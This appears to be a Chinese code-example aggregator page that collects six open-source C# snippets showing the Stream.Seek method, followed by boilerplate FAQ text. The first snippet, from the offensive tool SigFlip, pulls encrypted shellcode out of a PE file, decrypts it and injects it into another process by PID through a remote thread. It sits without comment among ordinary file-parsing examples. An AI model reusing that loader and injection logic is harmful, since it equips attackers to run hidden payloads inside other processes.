C# Stream.Seek的代码示例
Stream.Seek方法的主要功能描述
通过代码示例来学习C# Stream.Seek方法
通过代码示例来学习编程是非常高效的。
1. 代码示例提供了一个具体而直观的学习环境,使初学者能够立即看到编程概念和语法的实际应用。
2. 通过分析和模仿现有的代码实例,初学者可以更好地理解编程逻辑和算法的工作原理。
3. 代码实例往往涵盖了多种编程技巧和最佳实践,通过学习和模仿这些实例,学习者可以逐步掌握如何编写高效、可读性强和可维护的代码。这对于初学者来说,是一种快速提升编程水平的有效途径。
Stream.Seek是C#的System.IO命名空间下中的一个方法, 小编为大家找了一些网络大拿们常见的代码示例,源码中的Stream.Seek() 已经帮大家高亮显示了,大家可以重点学习Stream.Seek() 方法的写法,从而快速掌握该方法的应用。
Stream.Seek的代码示例1 - Main()
using System.IO;
public static void Main(string[] args)
{
ArgumentParser _parser = new ArgumentParser(args);
if (args.Length <= 0 || _parser.GetOrDefault("h", "help") == "true") {
Help();
}
if (_parser.GetOrDefault("f", "null") != "null") {
_pePath = _parser.GetOrDefault("f", "null");
_encKey = _parser.GetOrDefault("e", "null");
_pid = _parser.GetOrDefault("pid", "null");
if (_pePath == "null") Help();
if (_pid == "null") Help();
}
else {
Help();
}
if (!File.Exists(_pePath)) Help();
Console.WriteLine("[+]:Loading/Parsing PE File '{0}'", _pePath);
Console.WriteLine();
byte[] _peBlob = Utils.Read(_pePath);
int _dataOffset = Utils.scanPattern(_peBlob, _tag);
Console.WriteLine("[+]:Scanning for Shellcode...");
if ( _dataOffset == -1) {
Console.WriteLine("Could not locate data or shellcode");
Environment.Exit(0);
}
Stream stream = new MemoryStream(_peBlob);
long pos = stream.Seek(_dataOffset + _tag.Length, SeekOrigin.Begin);
Console.WriteLine("[+]: Shellcode located at {0:x2}", pos);
byte[] shellcode = new byte[_peBlob.Length - (pos + _tag.Length)];
stream.Read(shellcode, 0, (_peBlob.Length)- ((int)pos + _tag.Length));
byte[] _data = Utils.Decrypt(shellcode, _encKey);
stream.Close();
//Execute shellcode (just a basic/vanilla local shellcode injection logic, make sure to CHANGE this and use your custom shellcode loader.
//CreateThread
//ExecShellcode(_data);
//CreateRemoteThread
Loader.rexec(Convert.ToInt32(_pid), _data);
}
开发者ID: med0x2e, 项目名称: SigFlip, 代码行数: 56, 代码来源: Program.cs
在med0x2e提供的Main()方法中,该源代码示例一共有56行, 其中使用了Stream.Seek()1次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Seek()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Seek()可能更有帮助。
Stream.Seek的代码示例2 - AppendToNewlineSeparatedFile()
using System.IO;
public static void AppendToNewlineSeparatedFile(PhysicalFileSystem fileSystem, string filename, string newContent)
{
using (Stream fileStream = fileSystem.OpenFileStream(filename, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.ReadWrite, false))
{
using (StreamReader reader = new StreamReader(fileStream))
using (StreamWriter writer = new StreamWriter(fileStream))
{
long position = reader.BaseStream.Seek(0, SeekOrigin.End);
if (position > 0)
{
reader.BaseStream.Seek(position - 1, SeekOrigin.Begin);
}
string lastCharacter = reader.ReadToEnd();
if (lastCharacter != "\n" && lastCharacter != string.Empty)
{
writer.Write("\n");
}
writer.Write(newContent.Trim());
writer.Write("\n");
}
fileStream.Close();
}
}
开发者ID: microsoft, 项目名称: VFSForGit, 代码行数: 28, 代码来源: BlobPrefetcher.cs
在microsoft提供的AppendToNewlineSeparatedFile()方法中,该源代码示例一共有28行, 其中使用了Stream.Seek()2次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Seek()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Seek()可能更有帮助。
Stream.Seek的代码示例3 - GetEmbeddedData()
using System.IO;
///
/// Extracts the data embedded into MSI (into Binary table).
///
/// The session.
/// The name on resource in the Binary table.
///
public static byte[] GetEmbeddedData(this Session session, string binary)
{
//If binary is accessed this way it will raise "stream handle is not valid" exception
//object result = session.Database.ExecuteScalar("select Data from Binary where Name = 'Fake_CRT.msi'");
//Stream s = (Stream)result;
//using (FileStream fs = new FileStream(@"....\Wix# Samples\Simplified Bootstrapper\Fake CRT1.msi", FileMode.Create))
//{
// int Length = 256;
// var buffer = new Byte[Length];
// int bytesRead = s.Read(buffer, 0, Length);
// while (bytesRead > 0)
// {
// fs.Write(buffer, 0, bytesRead);
// bytesRead = s.Read(buffer, 0, Length);
// }
//}
//however View approach is OK
using (var sql = session.Database.OpenView("select Data from Binary where Name = '" + binary + "'"))
{
sql.Execute();
using (var record = sql.Fetch())
using (var stream = record.GetStream(1))
using (var ms = new IO.MemoryStream())
{
int Length = 256;
var buffer = new Byte[Length];
int bytesRead = stream.Read(buffer, 0, Length);
while (bytesRead > 0)
{
ms.Write(buffer, 0, bytesRead);
bytesRead = stream.Read(buffer, 0, Length);
}
ms.Seek(0, IO.SeekOrigin.Begin);
return ms.ToArray();
}
}
}
开发者ID: oleg-shilo, 项目名称: wixsharp, 代码行数: 47, 代码来源: Extensions.cs
在oleg-shilo提供的GetEmbeddedData()方法中,该源代码示例一共有47行, 其中使用了Stream.Seek()1次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Seek()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Seek()可能更有帮助。
Stream.Seek的代码示例4 - Load()
public void Load(System.IO.Stream stream)
{
using (FileReader reader = new FileReader(stream))
{
reader.ByteOrder = Syroot.BinaryData.ByteOrder.LittleEndian;
magic = reader.ReadBytes(4);
uint magicval = magic[0] + 256 * (uint)(magic[1]) + 65536 * (uint)(magic[2]) + 16777216 * (uint)(magic[3]);
if (magicval != MagicFileConstant)
throw new Exception("Invalid identifier");
BlockDimX = reader.ReadByte();
BlockDimY = reader.ReadByte();
BlockDimZ = reader.ReadByte();
xsize = reader.ReadBytes(3);
ysize = reader.ReadBytes(3);
zsize = reader.ReadBytes(3);
Width = (uint)(xsize[0] + 256 * xsize[1] + 65536 * xsize[2]);
Height = (uint)(ysize[0] + 256 * ysize[1] + 65536 * ysize[2]);
Depth = (uint)(zsize[0] + 256 * zsize[1] + 65536 * zsize[2]);
reader.Seek(0x10, System.IO.SeekOrigin.Begin);
DataBlock = reader.ReadBytes((int)(reader.BaseStream.Length - reader.Position));
Console.WriteLine(Width);
Console.WriteLine(Height);
Console.WriteLine(Depth);
if (BlockDimX == 4 && BlockDimY == 4)
Format = TEX_FORMAT.ASTC_4x4_UNORM;
else if (BlockDimX == 5 && BlockDimY == 4)
Format = TEX_FORMAT.ASTC_5x4_UNORM;
else if (BlockDimX == 5 && BlockDimY == 5)
Format = TEX_FORMAT.ASTC_5x5_UNORM;
else if (BlockDimX == 6 && BlockDimY == 5)
Format = TEX_FORMAT.ASTC_6x5_UNORM;
else if (BlockDimX == 6 && BlockDimY == 6)
Format = TEX_FORMAT.ASTC_6x6_UNORM;
else if (BlockDimX == 8 && BlockDimY == 5)
Format = TEX_FORMAT.ASTC_8x5_UNORM;
else if (BlockDimX == 8 && BlockDimY == 6)
Format = TEX_FORMAT.ASTC_8x6_UNORM;
else if (BlockDimX == 8 && BlockDimY == 8)
Format = TEX_FORMAT.ASTC_8x8_UNORM;
else if (BlockDimX == 10 && BlockDimY == 10)
Format = TEX_FORMAT.ASTC_10x10_UNORM;
else if (BlockDimX == 10 && BlockDimY == 5)
Format = TEX_FORMAT.ASTC_10x5_UNORM;
else if (BlockDimX == 10 && BlockDimY == 6)
Format = TEX_FORMAT.ASTC_10x6_UNORM;
else if (BlockDimX == 10 && BlockDimY == 8)
Format = TEX_FORMAT.ASTC_10x8_UNORM;
else
throw new Exception($"Unsupported block dims! ({BlockDimX} x {BlockDimY})");
}
stream.Dispose();
stream.Close();
}
开发者ID: KillzXGaming, 项目名称: Switch-Toolbox, 代码行数: 63, 代码来源: ASTC.cs
在KillzXGaming提供的Load()方法中,该源代码示例一共有63行, 其中使用了Stream.Seek()1次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Seek()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Seek()可能更有帮助。
Stream.Seek的代码示例5 - Load()
using System.IO;
public void Load(System.IO.Stream stream)
{
CanSave = true;
Text = FileName;
using (var reader = new FileReader(stream))
{
reader.ByteOrder = Syroot.BinaryData.ByteOrder.BigEndian;
uint FileSize = (uint)reader.BaseStream.Length;
reader.Seek(FileSize - 0x28, SeekOrigin.Begin);
header = new Header();
header.Read(reader);
reader.Seek(header.HeaderSize + FileSize - 0x28, SeekOrigin.Begin);
image = new Image();
image.Read(reader);
Format = GetFormat(image.BCLIMFormat);
Width = image.Width;
Height = image.Height;
LoadComponents(Format);
reader.Position = 0;
ImageData = reader.ReadBytes((int)image.ImageSize);
PlatformSwizzle = PlatformSwizzle.Platform_3DS;
}
}
开发者ID: KillzXGaming, 项目名称: Switch-Toolbox, 代码行数: 33, 代码来源: BCLIM.cs
在KillzXGaming提供的Load()方法中,该源代码示例一共有33行, 其中使用了Stream.Seek()2次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Seek()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Seek()可能更有帮助。
Stream.Seek的代码示例6 - Load()
using System.IO;
public void Load(System.IO.Stream stream)
{
CanSave = true;
Text = FileName;
using (var reader = new FileReader(stream))
{
uint FileSize = (uint)reader.BaseStream.Length;
reader.Seek(FileSize - 0x28, SeekOrigin.Begin);
header = new Header();
header.Read(reader);
bool Is3DS = reader.ByteOrder == Syroot.BinaryData.ByteOrder.LittleEndian;
reader.Seek(header.HeaderSize + FileSize - 0x28, SeekOrigin.Begin);
image = new Image(Is3DS);
image.Read(reader);
bool isBc4Alpha = image.BflimFormat == 16;
if (Is3DS)
Format = Formats3DS[image.BflimFormat];
else
Format = FormatsWiiU[image.BflimFormat];
Width = image.Width;
Height = image.Height;
LoadComponents(Format, isBc4Alpha);
uint ImageSize = reader.ReadUInt32();
reader.Position = 0;
ImageData = reader.ReadBytes((int)ImageSize);
if (!PluginRuntime.bflimTextures.ContainsKey(Text))
PluginRuntime.bflimTextures.Add(Text, this);
}
}
开发者ID: KillzXGaming, 项目名称: Switch-Toolbox, 代码行数: 44, 代码来源: BFLIM.cs
在KillzXGaming提供的Load()方法中,该源代码示例一共有44行, 其中使用了Stream.Seek()2次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Seek()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Seek()可能更有帮助。
Stream.Seek()方法的常见问题及解答
C#中Stream.Seek()的常见错误类型及注意事项
Stream.Seek的错误类型有很多, 这里就不一一阐述了,本文只列出一些常见的代码示例供参考,大家可以看一下代码中Catch语句中是否有常见的错误捕获及处理。
C#中Stream.Seek()的构造函数有哪些
Stream.Seek构造函数功能基本类似,只是参数不同; 目前主流的集成开发环境都已经带智能提醒了,如:Visual Studio; 大家可以非常轻松的通过Visual Studio中的智能提醒,了解对应构造函数的用法。
如何使用ChartGPT写一段Stream.Seek的代码
你可以在ChartGPT中输入如下的指令:"提供一个如何使用Stream.Seek的C#代码示例"
ChartGPT写出的代码和本文中的小编提供的代码的区别。 ChartGPT发展到现在已经非常聪明了,但需要使用这提供非常专业的问题,才可能有比较好的源代码示例; 而本文中, 小编已经帮您列出来基本所有类和所有方法的使用示例, 而且这些示例基本都是一些网络大佬提供的源码,可以更方便的供一些开发菜鸟或者资深开发参考和学习。
Stream.Seek所在的类及名称空间
Stream.Seek是System.IO下的方法。
Stream.Seek怎么使用?
Stream.Seek使用上比较简单,可以参考MSDN中的帮助文档,也参考本文中提供的7个使用示例。
Stream.Seek菜鸟教程
对于菜鸟来说,本文中提供的7个Stream.Seek写法都将非常直观的帮您掌握Stream.Seek的用法,是一个不错的参考教程。
本文中的Stream.Seek方法示例由csref.cn整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。